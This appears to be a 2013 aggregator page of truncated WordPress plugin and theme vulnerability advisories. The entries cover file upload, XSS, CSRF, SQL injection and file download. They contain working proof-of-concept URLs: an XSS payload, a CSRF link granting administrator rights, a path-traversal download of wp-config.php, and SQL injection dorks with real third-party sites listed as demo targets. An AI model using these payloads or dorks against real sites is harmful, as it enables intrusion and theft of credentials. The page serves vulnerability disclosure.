WordPress NextGEN Gallery 1.9.12 Shell Upload

15 June 2013 - Source: http://www.mondounix.com
##############################################################
 
 
                      - S21Sec Advisory -
 
 
##############################################################
 
     Title:   NextGEN Gallery 1.9.12 Arbitrary File Upload
        ID:   S21SEC-046-en
    CVE ID:   CVE-2013-3684
  Severity:   High
    Status:   Fixed
   History:   27.May.2013 Vulnerability discovered
              28.May.2013 Vendor informed
              12.Jun.2013 Fix released
    Authors:  Marcos Agüero (maguero@s21sec.com)
       URL: http://www.s21sec.com/images/labs/advisories/s21sec-046-en.txt
   Release:   Public
 
 
[ SUMMARY ]
 
NextGEN Gallery is a WordPress gallery plugin that offers sophisticated...


WordPress Ambience Cross Site Scripting

10 June 2013 - Source: http://www.mondounix.com
#####################################
Title:Xss In wordpress ambience theme
#####################
 
#Author:Darksnipper & Soul~Inj3ctor
 
#Email:Darksnipper@live.com
 
#####################################
#Home:-   www.MadLeeTs.com
#####################################
 
Theme Link:-Google About It :D
 
 
 
######################################################################
#P.o.c
 
http://127.0.0.1/wp-content/themes/ambience/thumb.php?src=<body onload=alert(/darksnipper/)>.jpg
 
 
 
Greetz:Dream.killer,Soul~inj3ct0r,Error
Haxor,Force-Ex,x3o-1337,Shadow008,1337,H4x0rl1f3,M4DSh4k,HaXor
KaKKa,Retno Pro, Tr4ck3r,b0x,Gujjar Pcp,madc0de Haxor,P4k
Command3r,Pain006,Anon...


WordPress User Role Editor 3.12 Cross Site Request Forgery

29 May 2013 - Source: http://www.mondounix.com
# Exploit Title: WP User Role Editor CSRF
# Date: 19/5/13
# Exploit Author: Henry Hoggard
# Author Website: http://henryhoggard.co.uk
# Vendor Homepage:https://wordpress.org/support/plugin/user-role-editor
# Software Link:https://wordpress.org/support/plugin/user-role-editor
# Version: <=3.12
# Tested on: Debian
# CVE : none yet
 
Notified Dev: 16/05/13
Patch Released (3.14): 17/05/13
 
Description:
This allows you to sign up with admin privileges if you make the admin
visit your CSRF script.
 
http://server/wordpress/wp-admin/users.php?page=user-role-editor.php&action=default&user_role=administrator
...


WordPress XSS and FPD vulnerabilities in I Love It New theme

26 May 2013 - Source: http://www.mondounix.com
 
-------------------------
Affected products:
-------------------------
 
All versions of I Love It New theme for WordPress. The theme contains vulnerable versions of VideoJS and Audio Player.
 
 
Vulnerable are web applications which are using VideoJS Flash Component 3.0.2 and previous versions. Version VideoJS Flash Component 3.0.2 is not vulnerable to mentioned XSS hole, except XSS via JS callbacks (as it can be read in repository on github). Also there are bypass methods which work in the last version, but the developers haven't fixed them due to their low impact. So update to last version of VideoJS.swf.
 
 
-------------------------
Affected vendors:
-------------------------
 
CosmoThemes
http://cosmothemes.com
 
----------
Details:
----------
 
Cross-Site...


WordPress Spider Catalog Multiple Vulnerabilities

22 May 2013 - Source: http://www.mondounix.com
Author: Janek Vind "waraxe"
Date: 22. May 2013
Location: Estonia, Tartu
Web: http://www.waraxe.us/advisory-105.html
 
 
Description of vulnerable software:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 
Spider Catalog is the best WordPress catalog plugin. It is a convenient tool
for organizing the products represented on your website into catalogs. Each
product on the catalog is assigned with a relevant category, which makes it
easier for the customers to search and identify the needed products within the
catalog.
 
http://wordpress.org/extend/plugins/catalog/
http://web-dorado.com/products/wordpress-catalog.html
 
Vulnerable is current version 1.4.6, older versions...


WordPress Spider Event Calendar Multiple Vulnerabilities

22 May 2013 - Source: http://www.mondounix.com
Author: Janek Vind "waraxe"
Date: 22. May 2013
Location: Estonia, Tartu
Web: http://www.waraxe.us/advisory-104.html
 
 
Description of vulnerable software:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 
Spider Event Calendar is a highly configurable plugin which allows you
to have multiple organized events in a calendar. This plugin is one of
the best WordPress Calendar available in WordPress Directory. If you
have problem with organizing your WordPress Calendar events and displaying
them in a calendar format, then Spider WordPress Calendar Plugin is the
best solution.
 
http://wordpress.org/extend/plugins/spider-event-calendar/
http://web-dorado.com/products/wordpress-calendar.html
 
Vulnerable...


WordPress Flagallery-Skins SQL Injection

22 May 2013 - Source: http://www.mondounix.com
##############
# Exploit Title : Wordpress Flagallery-skins plugin SQL Injection
#
# Exploit Author : Ashiyane Digital Security Team
#
# Home : www.ashiyane.org
#
# Security Risk : Medium
#
# Dork : inurl:/wp-content/plugins/flagallery-skins/compact_music_player/gallery.php?playlist=
#
# Tested on: Linux
#
##############
#Location:site/wp-content/plugins/flagallery-skins/compact_music_player/gallery.php?playlist=[SQL]
#
#
#DEm0:
# http://www.argomentitessili.com/wp-content/plugins/flagallery-skins/compact_music_player/gallery.php?playlist=my-playlist%27
#
# http://kiwirootsmusic.com/wp-content/plugins/flagallery-skins/compact_music_player/gallery.php?playlist=recordings%27
#
# http://www.buritacaworldbeat.com/wp-content/plugins/flagallery-skins/compact_music_player/gallery.php?playlist=burisongs%27
#
#...


WordPress ProPlayer Plugin SQL Injection

21 May 2013 - Source: http://www.mondounix.com
##############
# Exploit Title : WordPress ProPlayer Plugin SQL Injection
#
# Exploit Author : Ashiyane Digital Security Team
#
# Plugin Link  : http://wordpress.org/plugins/proplayer/
#
# Home : www.ashiyane.org
#
# Security Risk : High
#
# Version : 4.7.9.1
#
# Dork : inurl:wp-content/plugins/proplayer/playlist-controller.php?id=
#
# Tested on: Linux
#
##############
#Location:site/wp-content/plugins/proplayer/playlist-controller.php?id=[SQL]
#
#
#DEm0:
# http://www.andrewardizzoia.info/wp-content/plugins/proplayer/playlist-controller.php?id=32-0%27
#
# http://www.straightlinehdd.com/en/fear-no-ground/wp-content/plugins/proplayer/playlist-controller.php?id=151-0%27
#
# http://djmikewallace.com/wp-content/plugins/proplayer/playlist-controller.php?id=42-0%27
#
#...


WordPress wp-FileManager File Download

16 May 2013 - Source: http://www.mondounix.com
Title: Wordpress wp-FileManager Local File Download Vulnerability
Author: ByEge
Download: http://wordpress.org/extend/plugins/wp-filemanager/
Test Platform: Linux
Images: http://j1305.hizliresim.com/19/f/n0xxf.jpg
Vuln. Plat.: Web Application
 
 
 
Google Dorks: inurl:wp-content/plugins/wp-filemanager/
Test : http://server/wp-content/plugins/wp-filemanager/incl/libfile.php?&path=../../&filename=wp-config.php&action=download
...


WordPress Newsletter 3.2.6 Cross Site Scripting

16 May 2013 - Source: http://www.mondounix.com
Wordpress Newsletter Plugin 3.2.6 (alert) Reflected XSS Vulnerability
 
 
Vendor: Stefano Lissa
Product web page: http://wordpress.org/extend/plugins/newsletter/
Affected version: 3.2.6 and below
 
Summary: Newsletter is the perfect WordPress plugin for creating
real newsletters and mail marketing system on your WordPress blog.
 
Desc: The plugin suffers from an XSS issue due to a failure to properly
sanitize user-supplied input to the 'alert' GET parameter in the 'page.php'
script. Attackers can exploit this weakness to execute arbitrary HTML
and script code in a user's browser session.
 
 
=======================================================================
/subscription/page.php:
-----------------------
 
70:...
